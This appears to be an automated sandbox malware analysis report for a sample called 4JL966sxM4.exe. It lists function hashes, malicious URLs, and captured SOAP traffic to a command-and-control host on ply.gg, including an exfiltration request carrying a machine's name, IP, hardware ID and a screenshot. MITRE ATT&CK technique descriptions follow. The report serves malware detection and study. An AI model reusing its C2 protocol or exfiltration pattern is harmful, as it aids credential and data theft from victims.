String ID:
API String ID:
Opcode ID: 769200ff635287a180503790145884ee8d04d4c0a2789fa1848d8c8333bd5e0c
Instruction ID: c4c8e07b48c7bd6ece674163bff02350a0f8ccd94e4eff4367acb745215a764a
Opcode Fuzzy Hash: 769200ff635287a180503790145884ee8d04d4c0a2789fa1848d8c8333bd5e0c
Instruction Fuzzy Hash: 80C15E747000641FE688A6BD48647BF18ABABC875CF9E482D650ADB389CDA4DD4243F7

Uniqueness

Uniqueness Score: -1.00%

Function 055782A9 Relevance: .3, Instructions: 263COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.339632789.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5570000_4JL966sxM4.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adaaddf273f4f55ec12d66c2ab642c82139925991360cb04504089b42707265d
Instruction ID: c38d1aeafa04faa325dc3d1e7061303d14fcfa8c2ced61c1a04c0c1c79de8818
Opcode Fuzzy Hash: adaaddf273f4f55ec12d66c2ab642c82139925991360cb04504089b42707265d
Instruction Fuzzy Hash: 81712C747000241FE688A6BD48643BF18ABABC875CF9E582D650ADB7C9CDA4DD4243F7

Uniqueness

Uniqueness Score: -1.00%

Function 06500D50 Relevance: 10.3, Strings: 8, Instructions: 296COMMON

Download Yara Rule

Strings

$Qq, xrefs: 06500E42
$Qq, xrefs: 06500DCC
$Qq, xrefs: 06500F00
$Qq, xrefs: 06500F50
$Qq, xrefs: 06500E1C
$Qq, xrefs: 06500F82
$Qq, xrefs: 06500F76
$Qq, xrefs: 06500E4E

Memory Dump Source

Source File: 00000000.00000002.339821936.0000000006500000.00000040.00000800.00020000.00000000.sdmp, Offset: 06500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6500000_4JL966sxM4.jbxd

Similarity

API ID:
String ID: $Qq$$Qq$$Qq$$Qq$$Qq$$Qq$$Qq$$Qq
API String ID: 0-2254445507
Opcode ID: a9afb8ead0b48ecdab2e33d7266cf33b9814579779b049c9366925206ac0bc3f
Instruction ID: b662c7267c5ee52064723041ec71e4e753a799992d1e82de90af00298285ffba
Opcode Fuzzy Hash: a9afb8ead0b48ecdab2e33d7266cf33b9814579779b049c9366925206ac0bc3f
Instruction Fuzzy Hash: 3EB1E230B042468FEBA59F69C854ABEBBF6BF85304B14846AE406D73E1CB34DC41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 05573FF8 Relevance: 9.0, Strings: 7, Instructions: 223COMMON

Download Yara Rule

Strings

\sQq, xrefs: 0557414F
\sQq, xrefs: 055741A5
\sQq, xrefs: 05574075
\sQq, xrefs: 0557420D
\sQq, xrefs: 05574244
\sQq, xrefs: 055740AC
\sQq, xrefs: 05574114

Memory Dump Source

Source File: 00000000.00000002.339632789.0000000005570000.00000040.00000800.00020000.00000000.sdmp, Offset: 05570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5570000_4JL966sxM4.jbxd

Similarity

API ID:
String ID: \sQq$\sQq$\sQq$\sQq$\sQq$\sQq$\sQq
API String ID: 0-925152665
Opcode ID: 14cfb3b60a1e349729e0c6fb7f1822c9fb2161d0085d4a6deb1a857cdc309376
Instruction ID: 1ae871193a66d2f7fe6beaab84f2744d3a36b8e248cf85de29c7615d332a75ca
Opcode Fuzzy Hash: 14cfb3b60a1e349729e0c6fb7f1822c9fb2161d0085d4a6deb1a857cdc309376
Instruction Fuzzy Hash: 4F915B70A0060ADFDB14DF69C980D6ABBF2FF88714B548969D84A9B765DB30FC41CB90

Uniqueness

Uniqueness Score: -1.00%

Source: http://jul-nelson.gl.at.ply.gg:47198	Avira URL Cloud: Label: malware
Source: http://jul-nelson.gl.at.ply.gg	Avira URL Cloud: Label: malware
Source: jul-nelson.gl.at.ply.gg:47198	Avira URL Cloud: Label: malware
Source: http://jul-nelson.gl.at.ply.gg:47198/	Avira URL Cloud: Label: malware
Source: http://jul-nelson.gl.at.ply.gg:4	Avira URL Cloud: Label: malware

Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: jul-nelson.gl.at.ply.gg:47198Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: jul-nelson.gl.at.ply.gg:47198Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-AliveData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnect xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: jul-nelson.gl.at.ply.gg:47198Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: jul-nelson.gl.at.ply.gg:47198Content-Length: 1162728Expect: 100-continueAccept-Encoding: gzip, deflate
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: jul-nelson.gl.at.ply.gg:47198Content-Length: 1162728Expect: 100-continueAccept-Encoding: gzip, deflateData Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 75 73 65 72 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 43 69 74 79 3e 55 4e 4b 4e 4f 57 4e 3c 2f 61 3a 43 69 74 79 3e 3c 61 3a 43 6f 75 6e 74 72 79 3e 55 53 3c 2f 61 3a 43 6f 75 6e 74 72 79 3e 3c 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 43 3a 5c 55 73 65 72 73 5c 65 6e 67 69 6e 65 65 72 5c 44 65 73 6b 74 6f 70 5c 34 4a 4c 39 36 36 73 78 4d 34 2e 65 78 65 3c 2f 61 3a 46 69 6c 65 4c 6f 63 61 74 69 6f 6e 3e 3c 61 3a 48 61 72 64 77 61 72 65 3e 30 44 43 31 44 32 30 35 33 39 38 31 45 41 46 44 30 34 46 43 37 37 39 31 31 41 35 39 30 44 45 44 3c 2f 61 3a 48 61 72 64 77 61 72 65 3e 3c 61 3a 49 50 76 34 3e 31 39 31 2e 39 36 2e 31 35 30 2e 32 30 39 3c 2f 61 3a 49 50 76 34 3e 3c 61 3a 4c 61 6e 67 75 61 67 65 3e 45 6e 67 6c 69 73 68 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 3c 2f 61 3a 4c 61 6e 67 75 61 67 65 3e 3c 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 65 6e 67 69 6e 65 65 72 3c 2f 61 3a 4d 61 63 68 69 6e 65 4e 61 6d 65 3e 3c 61 3a 4d 6f 6e 69 74 6f 72 3e 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 42 51 41 41 41 41 51 41 43 41 59 41 41 41 43 2b 6b 2f 52 44 41 41 41 41 41 58 4e 53 52 30 49 41 72 73 34 63 36 51 41 41 41 41 52 6e 51 55 31 42 41 41 43 78 6a 77 76 38 59 51 55 41 41 41 41 4a 63 45 68 5a 63 77 41 41 44 73 4d 41 41 41 37 44 41 63 64 76 71 47 51 41 41 50 2b 6c 53 55 52 42 56 48 68 65 37 4c 30 48 75 47 31 56 65 65 35 2f 39 73 61 72 78 6f 49 6d 53 43 2b 48 62 71 38 78 4a 68 65 69 71 43 67 61 65 30 77 30 4d 65 57 66 33 4a 43 67 55 75 79 4b 49 6c 59 43 49 76 56 51 70 54 64 46 45 58 75 6a 32 46 50 75 6a 52 30 37 49 69 43 49 69 76 53 71 31 41 50 6a 50 37 34 78 35 7a 66 57 4f 37 37 35 7a 6a 4c 6d 6d 6d 76 74 74 63 39 5a 36 33 6c 2b 7a 39 70 72 39 44 36 2b 38 65 34 78 31 31 71 78 59 76 33 48 75 78 55 62 50 4b 46 67 77 79 65 36 46 52 73 39 4b 62 43 77 38 52 2b 58 2f 45 6b 6a 4b 7a 62 2b 30 34 53 46 54 66 34 73 6a 34 31 33 4c 4e 6a 30 7a 78 4e 57 62 46 61 79 2b 56 4d 4c 74 69 68 5a 2b 62 52 6d 74 6e 68 36 79 75 59 37 70 63 52 77 6b 71 37 6b 73 55 50 4b 35 6a 75 32 41 2b 45 58 49 76 38 37 73 6d 4c 54 50 78 75 78 69 57 38 58 59 65 4d 6e 56 39 6e 6f 6a 33 32 62 41 78 76 34 74 74 65 2b 57 4c 2b 47 44 52 34 58 57 46 69 2f 65 46 2f 78 4d 4f 67
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: jul-nelson.gl.at.ply.gg:47198Content-Length: 1162720Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: jul-nelson.gl.at.ply.gg:47198Content-Length: 1162720Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: 4JL966sxM4.exe, 00000000.00000002.339846768.0000000006790000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000003015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jul-nelson.gl.at.ply.gg
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.000000000333C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jul-nelson.gl.at.ply.gg:4
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000003015000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jul-nelson.gl.at.ply.gg:47198
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jul-nelson.gl.at.ply.gg:47198/
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000003015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002F62000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/04
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000003015000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002F3F000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.000000000333C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnviron
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.000000000333C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: 4JL966sxM4.exe, 00000000.00000002.337006053.0000000003015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/l
Source: tmpFA8A.tmp.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 4JL966sxM4.exe	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: 4JL966sxM4.exe	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: tmpFA8A.tmp.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: tmpFA8A.tmp.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004258000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004078000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000040C8000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004028000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000042A8000.00000004.00000800.00020000.00000000.sdmp, tmpFA58.tmp.0.dr, tmpFA79.tmp.0.dr, tmpC44E.tmp.0.dr, tmpC43D.tmp.0.dr, tmpC46F.tmp.0.dr, tmpFA57.tmp.0.dr, tmpC45E.tmp.0.dr, tmpFA35.tmp.0.dr, tmpFA46.tmp.0.dr, tmpFA68.tmp.0.dr, tmpFA9A.tmp.0.dr, tmpFA8A.tmp.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: tmpFA8A.tmp.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 4JL966sxM4.exe	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004258000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004078000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000040C8000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004028000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000042A8000.00000004.00000800.00020000.00000000.sdmp, tmpFA58.tmp.0.dr, tmpFA79.tmp.0.dr, tmpC44E.tmp.0.dr, tmpC43D.tmp.0.dr, tmpC46F.tmp.0.dr, tmpFA57.tmp.0.dr, tmpC45E.tmp.0.dr, tmpFA35.tmp.0.dr, tmpFA46.tmp.0.dr, tmpFA68.tmp.0.dr, tmpFA9A.tmp.0.dr, tmpFA8A.tmp.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004258000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004078000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000040C8000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004028000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000042A8000.00000004.00000800.00020000.00000000.sdmp, tmpFA58.tmp.0.dr, tmpFA79.tmp.0.dr, tmpC44E.tmp.0.dr, tmpC43D.tmp.0.dr, tmpC46F.tmp.0.dr, tmpFA57.tmp.0.dr, tmpC45E.tmp.0.dr, tmpFA35.tmp.0.dr, tmpFA46.tmp.0.dr, tmpFA68.tmp.0.dr, tmpFA9A.tmp.0.dr, tmpFA8A.tmp.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004258000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004078000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000040C8000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004028000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000042A8000.00000004.00000800.00020000.00000000.sdmp, tmpFA58.tmp.0.dr, tmpFA79.tmp.0.dr, tmpC44E.tmp.0.dr, tmpC43D.tmp.0.dr, tmpC46F.tmp.0.dr, tmpFA57.tmp.0.dr, tmpC45E.tmp.0.dr, tmpFA35.tmp.0.dr, tmpFA46.tmp.0.dr, tmpFA68.tmp.0.dr, tmpFA9A.tmp.0.dr, tmpFA8A.tmp.0.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004258000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004078000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000040C8000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004028000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000042A8000.00000004.00000800.00020000.00000000.sdmp, tmpFA58.tmp.0.dr, tmpFA79.tmp.0.dr, tmpC44E.tmp.0.dr, tmpC43D.tmp.0.dr, tmpC46F.tmp.0.dr, tmpFA57.tmp.0.dr, tmpC45E.tmp.0.dr, tmpFA35.tmp.0.dr, tmpFA46.tmp.0.dr, tmpFA68.tmp.0.dr, tmpFA9A.tmp.0.dr, tmpFA8A.tmp.0.dr	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004258000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004078000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000040C8000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.0000000004028000.00000004.00000800.00020000.00000000.sdmp, 4JL966sxM4.exe, 00000000.00000002.337522595.00000000042A8000.00000004.00000800.00020000.00000000.sdmp, tmpFA58.tmp.0.dr, tmpFA79.tmp.0.dr, tmpC44E.tmp.0.dr, tmpC43D.tmp.0.dr, tmpC46F.tmp.0.dr, tmpFA57.tmp.0.dr, tmpC45E.tmp.0.dr, tmpFA35.tmp.0.dr, tmpFA46.tmp.0.dr, tmpFA68.tmp.0.dr, tmpFA9A.tmp.0.dr, tmpFA8A.tmp.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

